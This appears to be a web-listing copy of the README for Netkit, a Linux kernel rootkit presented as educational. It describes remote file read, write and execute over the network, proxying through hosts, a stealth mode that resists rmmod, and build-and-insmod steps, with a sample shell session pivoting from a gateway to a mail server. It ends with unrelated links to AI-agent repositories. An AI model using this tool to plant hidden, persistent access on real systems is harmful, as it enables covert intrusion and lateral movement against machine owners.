Netkit
Linux rootkit for educational purposes
Install / Use
/learn @Notselwyn/NetkitREADME
Netkit
Netkit is a purposefully small rootkit which can be used by clients over network to maintain a sneaky foothold into a device.
Overview
Netkit has several features:
- File read
- File write
- File execute (stderr + stdout)
- Proxy
- Self deletion (stopping the module from running and free'ing resources)
Usage
Once the rootkit is loaded into the system, a user may want to interact with it using the provided psuedo-shell:
cd netkit
$ python3 client/shell.py 10.10.10.1:8008
10.10.10.1:8008/ $ hosts
usage:
- hosts push <ip>:<port>
- hosts pop
10.10.10.1:8008/ $ hostname
gateway-1a723f
10.10.10.1:8008/ $ hosts push 10.10.10.2:8008
[+] successfully added device 10.10.10.2:8008 to hosts list
10.10.10.1:8008->10.10.10.2:8008/ $ hostname
mail-server
Compilation
To run the rootkit, optionally tweak it in the configurations, build it using make and ship it using insmod, or any other kernel module loader.
==== Please make sure to adjust CONFIG_NETKIT_DEBUG to your liking ====
If CONFIG_NETKIT_DEBUG is enabled, then stealth mode is enabled and the rootkit can only be stopped using the self destruct / exit cmd (not using rmmod).
Make sure to set $KERNEL_DIR to your kernels' hedaer files, like KERNEL_DIR=/usr/src/linux-headers-$(uname -r)
git clone https://github.com/notselwyn/netkit/
cd netkit
make KERNEL_DIR=$KERNEL_DIR
ls -la netkit.ko
Running it with notselwyn/kernel-scripts
Since the rootkit was developed with the author's kernel-scripts, it's a breeze to debug and test. Simply download the scripts and compile a compatible Linux kernel.
To run the kernel:
cd netkit
create-image.sh
run.sh $KERNEL_DIR
To run and interact with the rootkit (make sure it's in debug mode to allow for rmmod in run_kmod.sh):
cd netkit
run_kmod.sh netkit.ko netkit
run_python.sh client/shell.py
Disclaimer
The programs and scripts ("programs") in this software directory/folder/repository ("repository") are published, developed and distributed for educational/research purposes only. I ("the creator") do not condone any malicious or illegal usage of the programs in this repository, as the intend is sharing research and not doing illegal activities with it. I am not legally responsible for anything you do with the programs in this repository.
Related Skills
YC-Killer
2.7kA library of enterprise-grade AI agents designed to democratize artificial intelligence and provide free, open-source alternatives to overvalued Y Combinator startups. If you are excited about democratizing AI access & AI agents, please star ⭐️ this repository and use the link in the readme to join our open source AI research team.
best-practices-researcher
The most comprehensive Claude Code skills registry | Web Search: https://skills-registry-web.vercel.app
groundhog
398Groundhog's primary purpose is to teach people how Cursor and all these other coding agents work under the hood. If you understand how these coding assistants work from first principles, then you can drive these tools harder (or perhaps make your own!).
isf-agent
a repo for an agent that helps researchers apply for isf funding
